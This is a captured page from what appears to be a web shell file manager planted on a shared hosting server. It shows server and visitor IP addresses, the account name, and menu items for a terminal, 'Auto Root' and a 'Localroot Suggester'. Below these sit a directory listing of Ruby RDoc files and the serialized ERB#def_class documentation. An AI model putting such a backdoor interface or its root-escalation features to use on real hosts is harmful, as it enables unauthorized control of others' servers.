Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby19 /
share /
ri /
1.9.1 /
system /
ERB /
Delete
Unzip
Name
Size
Permission
Date
Action
DefMethod
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Util
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
cdesc-ERB.ri
8.22
KB
-rw-r--r--
2023-07-26 17:26
def_class-i.ri
749
B
-rw-r--r--
2023-07-26 17:26
def_method-i.ri
598
B
-rw-r--r--
2023-07-26 17:26
def_module-i.ri
630
B
-rw-r--r--
2023-07-26 17:26
filename-i.ri
256
B
-rw-r--r--
2023-07-26 17:26
new-c.ri
2.55
KB
-rw-r--r--
2023-07-26 17:26
result-i.ri
523
B
-rw-r--r--
2023-07-26 17:26
run-i.ri
237
B
-rw-r--r--
2023-07-26 17:26
set_eoutvar-i.ri
412
B
-rw-r--r--
2023-07-26 17:26
src-i.ri
190
B
-rw-r--r--
2023-07-26 17:26
version-c.ri
230
B
-rw-r--r--
2023-07-26 17:26
Save
Rename
U:RDoc::AnyMethod[iI"def_class:EFI"ERB#def_class;FF:publico:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"SDefine unnamed class which has _methodname_ as instance method, and return it.;To:RDoc::Markup::BlankLine o; ; [I" example:;To:RDoc::Markup::Verbatim; [I"class MyClass_ ;FI"" def initialize(arg1, arg2) ;FI"% @arg1 = arg1; @arg2 = arg2 ;FI" end ;FI" end ;FI"Mfilename = 'example.rhtml' # @arg1 and @arg2 are used in example.rhtml ;FI"(erb = ERB.new(File.read(filename)) ;FI"erb.filename = filename ;FI"3MyClass = erb.def_class(MyClass_, 'render()') ;FI"+print MyClass.new('foo', 123).render();F: @file000[ I"-(superklass=Object, methodname='result');TI"lib/erb.rb;T